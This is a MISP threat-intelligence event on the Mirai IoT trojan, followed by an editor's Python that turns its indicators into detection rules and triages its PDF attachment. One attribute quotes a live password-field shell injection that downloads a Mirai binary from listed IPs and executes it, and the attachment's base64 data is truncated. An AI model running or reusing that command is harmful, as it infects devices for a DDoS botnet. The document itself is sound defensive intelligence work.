262 lines
1.3 MiB
JSON
{
  "Event": {
    "analysis": "2",
    "date": "2016-10-01",
    "extends_uuid": "",
    "info": "OSINT - Investigation of Linux.Mirai Trojan family",
    "publish_timestamp": "1475309596",
    "published": true,
    "threat_level_id": "3",
    "timestamp": "1475309569",
    "uuid": "57ef6d48-20c8-4e55-9f02-468f950d210f",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#3b7500",
        "name": "circl:incident-classification=\"malware\""
      },
      {
        "colour": "#004646",
        "name": "type:OSINT"
      },
      {
        "colour": "#32003e",
        "name": "ms-caro-malware:malware-type=\"DDoS\""
      },
      {
        "colour": "#670080",
        "name": "ms-caro-malware:malware-platform=\"Linux\""
      },
      {
        "colour": "#0088cc",
        "name": "misp-galaxy:tool=\"Mirai\""
      }
    ],
    "Attribute": [
      {
        "category": "External analysis",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475308942",
        "to_ids": false,
        "type": "comment",
        "uuid": "57ef6d8e-6630-40f3-976b-4234950d210f",
        "value": "A Trojan for Linux that was named Linux.Mirai has several predecessors. The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87. At the beginning of August, a new version of this Trojan Linux.DDoS.89 was discovered. Finally, Doctor Web\u2019s security researchers investigated the \r\nLinux.Mirai Trojan found later that month."
      },
      {
        "category": "External analysis",
        "comment": "Dr.WEB - Investigation of Linux.Mirai Trojan family",
"data": "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
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475308992",
        "to_ids": false,
        "type": "attachment",
        "uuid": "57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
        "value": "Investigation_of_Linux.Mirai_Trojan_family_en.pdf"
      },
      {
        "category": "Payload delivery",
        "comment": "x86",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309027",
        "to_ids": true,
        "type": "sha1",
        "uuid": "57ef6de3-827c-4967-9708-42ce950d210f",
        "value": "c129e2a23abe826f808725a0724f12470502a3cc"
      },
      {
        "category": "Payload delivery",
        "comment": "ARM",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309027",
        "to_ids": true,
        "type": "sha1",
        "uuid": "57ef6de3-f1b0-4776-9e5a-4add950d210f",
        "value": "8fd0d16edf270c453c5b6b2481d0a044a410c7cd"
      },
      {
        "category": "Payload delivery",
        "comment": "ARM",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309027",
        "to_ids": true,
        "type": "sha1",
        "uuid": "57ef6de3-b284-456d-b74a-4b63950d210f",
        "value": "9ff383309ad63da2caa9580d7d85abeece9b13a0"
      },
      {
        "category": "Artifacts dropped",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309209",
        "to_ids": true,
        "type": "filename",
        "uuid": "57ef6e99-0a20-4839-a902-4e4d950d210f",
        "value": ".shinigami"
      },
      {
        "category": "Payload delivery",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309292",
        "to_ids": true,
        "type": "url",
        "uuid": "57ef6eec-c238-49ec-a6f8-4521950d210f",
        "value": "http://5.206.225.122/bins/mirai.arm"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309307",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "57ef6efb-b9fc-498a-a704-4f7f950d210f",
        "value": "5.206.225.122"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309335",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "57ef6f17-16f4-4e11-b0ce-4e91950d210f",
        "value": "151.80.99.84"
      },
      {
        "category": "Payload delivery",
        "comment": "The malware was installed on a dvr and was started with this bash injection in password field",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309367",
        "to_ids": true,
        "type": "comment",
        "uuid": "57ef6f37-5074-4e2b-85e6-4599950d210f",
        "value": "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"
      },
      {
        "category": "External analysis",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309391",
        "to_ids": false,
        "type": "link",
        "uuid": "57ef6f4f-8220-43c7-912c-4818950d210f",
        "value": "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"
      },
      {
        "category": "Payload delivery",
        "comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309570",
        "to_ids": true,
        "type": "sha256",
        "uuid": "57ef7002-6900-46c9-ac17-465d02de0b81",
        "value": "f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc"
      },
      {
        "category": "Payload delivery",
        "comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309570",
        "to_ids": true,
        "type": "md5",
        "uuid": "57ef7002-0194-4671-b962-44fa02de0b81",
        "value": "78440b86e34579001bea6ebc600751f5"
      },
      {
        "category": "External analysis",
        "comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309570",
        "to_ids": false,
        "type": "link",
        "uuid": "57ef7002-0738-471a-8108-4e7502de0b81",
        "value": "https://www.virustotal.com/file/f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc/analysis/1465114448/"
      },
      {
        "category": "Payload delivery",
        "comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309570",
        "to_ids": true,
        "type": "sha256",
        "uuid": "57ef7002-2174-4783-bf9b-4e0a02de0b81",
        "value": "7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc"
      },
      {
        "category": "Payload delivery",
        "comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309571",
        "to_ids": true,
        "type": "md5",
        "uuid": "57ef7003-6fac-4d16-86e4-411502de0b81",
        "value": "e64079b3ccf906204474beca1f5cc41d"
      },
      {
        "category": "External analysis",
        "comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309571",
        "to_ids": false,
        "type": "link",
        "uuid": "57ef7003-9390-423a-a424-4b2a02de0b81",
        "value": "https://www.virustotal.com/file/7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc/analysis/1464739147/"
      },
      {
        "category": "Payload delivery",
        "comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309571",
        "to_ids": true,
        "type": "sha256",
        "uuid": "57ef7003-e8e4-4eee-b196-4b8e02de0b81",
        "value": "45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56"
      },
      {
        "category": "Payload delivery",
        "comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309571",
        "to_ids": true,
        "type": "md5",
        "uuid": "57ef7003-2388-4060-a02f-48c602de0b81",
        "value": "5d25f735cf059d6b4076947860da5c45"
      },
      {
        "category": "External analysis",
        "comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1475309571",
        "to_ids": false,
        "type": "link",
        "uuid": "57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
        "value": "https://www.virustotal.com/file/45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56/analysis/1465114403/"
      }
    ]
  }
}
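What a consumer of this event actually does with it, as an added example (editor's code, not part of the event and not MISP or PyMISP code): parse the export with the standard library, keep only the attributes flagged `to_ids` (the flag MISP uses to mark values meant for detection; `comment` and `link` attributes are context even when it is set, as on the injection-command comment above), stitch each `Xchecked via VT` md5/sha256 back onto the sha1 its comment names so every sample ends up with a full hash set, and split the password-field injection into its shell stages so the hosts it downloads from can be checked against the structured `ip-dst` attributes. `EVENT_JSON` is a trimmed copy of the event above (bookkeeping keys and the attachment's base64 `data` dropped); the Suricata rule text is an assumed output format, not something the event prescribes; busybox `tftp` option handling (`-g` as a bare flag, `-l`/`-r` for local/remote name, host positional) is what the parser relies on.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlparse

# Trimmed copy of the event above, constructed for this example: only the keys the
# functions read are kept, and the attachment's base64 "data" is left out.
EVENT_JSON = r'''{"Event": {"uuid": "57ef6d48-20c8-4e55-9f02-468f950d210f",
 "info": "OSINT - Investigation of Linux.Mirai Trojan family", "Attribute": [
 {"type": "sha1", "comment": "x86", "to_ids": true, "deleted": false, "value": "c129e2a23abe826f808725a0724f12470502a3cc"},
 {"type": "sha1", "comment": "ARM", "to_ids": true, "deleted": false, "value": "8fd0d16edf270c453c5b6b2481d0a044a410c7cd"},
 {"type": "sha1", "comment": "ARM", "to_ids": true, "deleted": false, "value": "9ff383309ad63da2caa9580d7d85abeece9b13a0"},
 {"type": "filename", "comment": "", "to_ids": true, "deleted": false, "value": ".shinigami"},
 {"type": "url", "comment": "", "to_ids": true, "deleted": false, "value": "http://5.206.225.122/bins/mirai.arm"},
 {"type": "ip-dst", "comment": "", "to_ids": true, "deleted": false, "value": "5.206.225.122"},
 {"type": "ip-dst", "comment": "", "to_ids": true, "deleted": false, "value": "151.80.99.84"},
 {"type": "comment", "to_ids": true, "deleted": false,
  "comment": "The malware was installed on a dvr and was started with this bash injection in password field",
  "value": "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"},
 {"type": "link", "comment": "", "to_ids": false, "deleted": false, "value": "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"},
 {"type": "sha256", "comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0", "to_ids": true, "deleted": false, "value": "f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc"},
 {"type": "md5", "comment": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0", "to_ids": true, "deleted": false, "value": "78440b86e34579001bea6ebc600751f5"},
 {"type": "sha256", "comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd", "to_ids": true, "deleted": false, "value": "7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc"},
 {"type": "md5", "comment": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd", "to_ids": true, "deleted": false, "value": "e64079b3ccf906204474beca1f5cc41d"},
 {"type": "sha256", "comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc", "to_ids": true, "deleted": false, "value": "45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56"},
 {"type": "md5", "comment": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc", "to_ids": true, "deleted": false, "value": "5d25f735cf059d6b4076947860da5c45"}
]}}'''

HASH_TYPES = ("md5", "sha1", "sha256")
CONTEXT_TYPES = ("comment", "link")  # human context, never a matchable pattern, whatever to_ids says
XCHECK_RE = re.compile(r"Xchecked via VT: ([0-9a-f]{40})")

def load_event(text):
    """A MISP export wraps the event in a top-level "Event" object."""
    return json.loads(text)["Event"]

def ids_indicators(event):
    """{type: sorted values} for live attributes flagged to_ids, the ones meant to feed detection."""
    out = defaultdict(set)
    for a in event["Attribute"]:
        if a.get("deleted") or not a.get("to_ids") or a["type"] in CONTEXT_TYPES:
            continue
        out[a["type"]].add(a["value"])
    return {t: sorted(v) for t, v in out.items()}

def cluster_hashes(event):
    """Attach each 'Xchecked via VT' md5/sha256 to the sha1 its comment names, one dict per sample."""
    samples = {a["value"]: {"sha1": a["value"], "arch": a.get("comment", "")}
               for a in event["Attribute"] if a["type"] == "sha1"}
    for a in event["Attribute"]:
        m = XCHECK_RE.search(a.get("comment", ""))
        if m and a["type"] in HASH_TYPES and m.group(1) in samples:
            samples[m.group(1)][a["type"]] = a["value"]
    return samples

def injection_commands(event):
    """Comment attributes with to_ids set carry the injected command itself, not analyst notes."""
    return [a["value"] for a in event["Attribute"] if a["type"] == "comment" and a.get("to_ids")]

def parse_injection(cmd):
    """Split the password-field payload into shell stages and pull out what it fetches and drops.
    'Password=' is the login form field; everything after the first ';' runs in the device shell."""
    body = cmd.partition(";")[2]
    stages = [s.strip() for s in re.split(r";|\|\|", body) if s.strip()]
    found = {"stages": stages, "tftp": None, "urls": [], "hosts": set(), "dropped": set()}
    for stage in stages:
        argv = stage.split()
        if argv[0] == "tftp":
            # busybox tftp: -g (get) is a bare flag, -l/-r name the local/remote file, host is positional
            opt = {k: v for k, v in zip(argv, argv[1:]) if k in ("-l", "-r")}
            found["tftp"] = {"host": argv[-1], "remote": opt["-r"], "local": opt["-l"]}
            found["hosts"].add(argv[-1])
            found["dropped"].add(opt["-l"])
        elif argv[0] == "wget":
            urls = [t for t in argv if t.startswith(("http://", "https://"))]
            found["urls"] += urls
            found["hosts"].update(urlparse(u).hostname for u in urls)
            if "-O" in argv:
                found["dropped"].add(argv[argv.index("-O") + 1])
        elif argv[0] == "chmod":
            found["dropped"].add(argv[-1])
    return found

def injection_hosts_covered(event):
    """True when every host the injected commands fetch from is already an ip-dst indicator,
    i.e. the free-text comment adds no network IOC the structured attributes lack."""
    hosts = set().union(*(parse_injection(c)["hosts"] for c in injection_commands(event)))
    return hosts <= set(ids_indicators(event).get("ip-dst", []))

def to_suricata(indicators, sid=1000000):
    """Render the network indicators as Suricata rules (assumed output format, not part of the event)."""
    rules = []
    for ip in indicators.get("ip-dst", []):
        sid += 1
        rules.append(f'alert ip $HOME_NET any -> {ip} any (msg:"Mirai host {ip}"; sid:{sid}; rev:1;)')
    for url in indicators.get("url", []):
        u, sid = urlparse(url), sid + 1
        rules.append(f'alert http $HOME_NET any -> any any (msg:"Mirai payload fetch {url}"; http.host; '
                     f'content:"{u.hostname}"; http.uri; content:"{u.path}"; sid:{sid}; rev:1;)')
    return rules
```

Two things the event's layout makes easy to get wrong: the injection command is a `comment` attribute with `to_ids` true, so a naive "export everything with `to_ids`" would push a shell one-liner into a blocklist, and the md5/sha256 values only tie back to a sample through the free-text `Xchecked via VT` comment, so without the regex join a feed would carry nine unrelated hashes instead of three samples. The `injection_hosts_covered` check confirms that both download hosts in the command (`151.80.99.84` over tftp, `5.206.225.122` over HTTP) are already present as `ip-dst` attributes.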
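The attachment attribute carries the analysed PDF base64-encoded in its `data` field. As an added example (editor's code, not part of the event and not MISP code), the block below decodes the leading bytes of that field, copied verbatim from the event above, and runs the checks worth doing before anyone opens or detonates the file: confirm it really is a PDF, read the producer comment, and look for a standard-security-handler encryption dictionary. This one declares `/Filter/Standard /V 1 /R 2`, which is the 40-bit RC4 handler from the PDF specification; the metadata stream and Info-dictionary strings that follow it in the file are ciphertext, so a sandbox or parser that does not implement the standard security handler sees nothing useful. The scan is a regex heuristic over raw bytes rather than a parse (the trailer's `/Encrypt` reference is not in the prefix); `ATTACHMENT_B64_PREFIX` holds the first 356 characters of the field, and the function and key names are the example's own.

```python
import base64
import re

# Leading bytes of the attachment's base64 "data" field, copied verbatim from the
# event above (the full field is the ~1.3 MiB PDF; this much covers the header and
# the first object, which is all the checks below need).
ATTACHMENT_B64_PREFIX = (
    "JVBERi0xLjQNCiXi48/TDQolDQold1BERjQgYnkgV1BDdWJlZCBHbWJILCAgMzJiaXQgIHVuaWNvZGUg"
    "DQolDQolDQoxIDAgb2JqDQo8PA0KL0ZpbHRlci9TdGFuZGFyZAovUiAyIC9WIDEKL088ZjM0NWExY2Ri"
    "MDg0ODAxZDk5NGQ3OGY2OWU4YjIyNjIwNDUyZjliZmI0MTA3ZDJmZTJkNGJiOTJjZmVlNjJjOD4KL1U8"
    "MTI4NWEyMjc5M2E3OTU5Yjc1Y2E0NDU5ZjhhNThiYjc4ZTBlNDNiMThhNTZhZTU1ZDU3Njg5Y2E3MGI1"
    "Mjc4Mz4KL1AgLTM4ODQNCj4+DQplbmRvYmoN"
)

MAGIC_RE = re.compile(rb"^%PDF-(\d\.\d)")
COMMENT_RE = re.compile(rb"^%([ -~]{4,})\r?$", re.M)   # printable %-comment lines (producer banner)
STANDARD_RE = re.compile(rb"/Filter\s*/Standard")      # the standard security handler
INT_RE = {k: re.compile(rb"/" + k + rb"\s+(-?\d+)") for k in (b"V", b"R", b"P")}
HEX_RE = {k: re.compile(rb"/" + k + rb"\s*<([0-9A-Fa-f]+)>") for k in (b"O", b"U")}
# /V selects the algorithm, /R the handler revision that goes with it (PDF 1.4 to 1.7).
CIPHER_BY_V = {1: "RC4 40-bit", 2: "RC4, key length from /Length",
               4: "crypt filters (AESV2 or RC4)", 5: "AES-256"}

def decode_attachment(b64):
    """MISP ships attachment bytes base64-encoded in the attribute's "data" field.
    validate=True makes stray characters an error instead of silently skipping them."""
    return base64.b64decode(b64, validate=True)

def triage_pdf(blob):
    """Parser-free checks to run before a PDF attachment is opened, detonated or shared.
    The encryption scan is a heuristic over raw bytes: a real check follows the trailer's
    /Encrypt reference, but a truncated or damaged file has no trailer to follow."""
    info = {"is_pdf": False, "version": None, "producer_comment": None, "encrypted": False,
            "V": None, "R": None, "P": None, "O": None, "U": None, "cipher": None}
    m = MAGIC_RE.match(blob)
    if not m:
        return info
    info["is_pdf"], info["version"] = True, m.group(1).decode()
    comments = [c for c in COMMENT_RE.findall(blob) if not c.startswith(b"PDF-")]
    if comments:
        info["producer_comment"] = comments[0].decode("ascii").strip()
    enc = STANDARD_RE.search(blob)
    if enc:
        window = blob[enc.start():enc.start() + 512]   # the dictionary is short; stay local to it
        info["encrypted"] = True
        for k, rx in INT_RE.items():
            n = rx.search(window)
            info[k.decode()] = int(n.group(1)) if n else None
        for k, rx in HEX_RE.items():
            h = rx.search(window)
            info[k.decode()] = h.group(1).decode().lower() if h else None
        info["cipher"] = CIPHER_BY_V.get(info["V"], "unknown /V")
    return info
```

The `/P -3884` value is the permissions bitmask and `/O` and `/U` are the owner- and user-password validation strings; an encrypted attachment that still opens without a prompt has an empty user password, which is the common case for report PDFs locked against editing, but the point for triage is that hashes, string searches and YARA rules written against plaintext PDF content will not match the streams inside this file.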